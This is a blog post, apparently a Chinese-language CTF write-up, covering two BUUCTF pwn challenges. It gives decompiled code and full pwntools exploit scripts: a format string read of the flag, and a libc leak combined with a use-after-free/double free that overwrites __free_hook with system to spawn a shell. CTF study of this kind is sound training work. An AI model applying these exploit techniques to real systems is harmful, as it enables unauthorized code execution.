buuctf-pwn系列1

记录下buuctf pwn的write up

judgement_mna_2016

int __cdecl main(int argc, const char **argv, const char **envp)
{
void *v3; // esp
int result; // eax
char format; // [esp+0h] [ebp-4Ch]
unsigned int v6; // [esp+40h] [ebp-Ch]
int *v7; // [esp+44h] [ebp-8h]

v7 = &argc;
v6 = __readgsdword(0x14u);
v3 = alloca(144);
printf("Flag judgment system\nInput flag >> ");
if ( getnline(&format, 0x40) )
{
printf(&format);
if ( !strcmp(&format, flag) )
result = puts("\nCorrect flag!!");
else
result = puts("\nWrong flag...");
}
else
{
puts("Unprintable character");
result = -1;
}
return result;
}

逻辑就是之前把flag文件读入内存,然后输入字符串和flag字符串进行对比
主函数存在格式化字符串漏洞,我们直接在栈上找到格式化字符串参数的位置,然后直接读出来即可

from pwn import *

local = 0

binary = "./judgement_mna_2016"
port = "29113"

if local == 1:
p = process(binary)
else:
p = remote("node3.buuoj.cn",port)

def dbg():
context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

p.recvuntil("Input flag >> ")
payload = "%28$s"
p.sendline(payload)

p.interactive()

ciscn_2019_en_3

  • 考点
    1. 程序调试,栈溢出泄漏地址
    2. libc-2.27 UAF

程序先给了一个输入name和id的东西,发现了格式化字符串但是由于是__printf_chk,所以没找到好的利用点
然后下面是输入id,还有个puts,调试发现id后面是有libc函数setbuffer的,又因为是puts函数直接来给他泄漏出来

add功能只允许申请0-0x50大小的chunk

_isoc99_scanf("%d", &size);
if ( size < 0 && size > 0x50 )
exit(0);

delete功能存在UAF
在老版的libc-2.27下是允许double free存在的
然后直接改__free_hook为system一把梭就行了
新版的打完今天的VN再试一下

from pwn import *

local = 0

binary = "./ciscn_2019_en_3"
libc_path = '../libc-2.27.so'
port = "27391"

if local == 1:
p = process(binary)
else:
p = remote("node3.buuoj.cn",port)

def dbg():
context.log_level = 'debug'

def leak_libc(addr):
global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_
libc = ELF(libc_path)
libc_base = addr - libc.sym['setbuffer']
print ("[*] libc base:",hex(libc_base))
__malloc_hook = libc_base + libc.sym['__malloc_hook']
system = libc_base + libc.sym['system']
# binsh_addr = libc_base + libc.search('/bin/sh').next()
__free_hook = libc_base + libc.sym['__free_hook']
_IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']

def add(size,content):
p.sendlineafter('Input your choice','1')
p.sendlineafter('Please input the size of story:',str(size))
p.sendafter('please inpute the story:',content)

def free(index):
p.sendlineafter('Input your choice:','4')
p.sendlineafter('Please input the index:',str(index))

context.terminal = ['tmux','splitw','-h']

p.recvuntil("What's your name?")
p.sendline("A13x")
p.recvuntil("Please input your ID.")
p.send("aaaaaaaa")

leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) - 231
leak_libc(leak)

add(0x50,"1")
add(0x50,"/bin/sh\x00")

free(0)
free(0)

add(0x50,p64(__free_hook))
add(0x50,"A13x")
add(0x50,p64(system))
free(1)

p.interactive()
文章作者: Alex
文章链接: http://example.com/2021/03/13/pwn1/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alex's blog~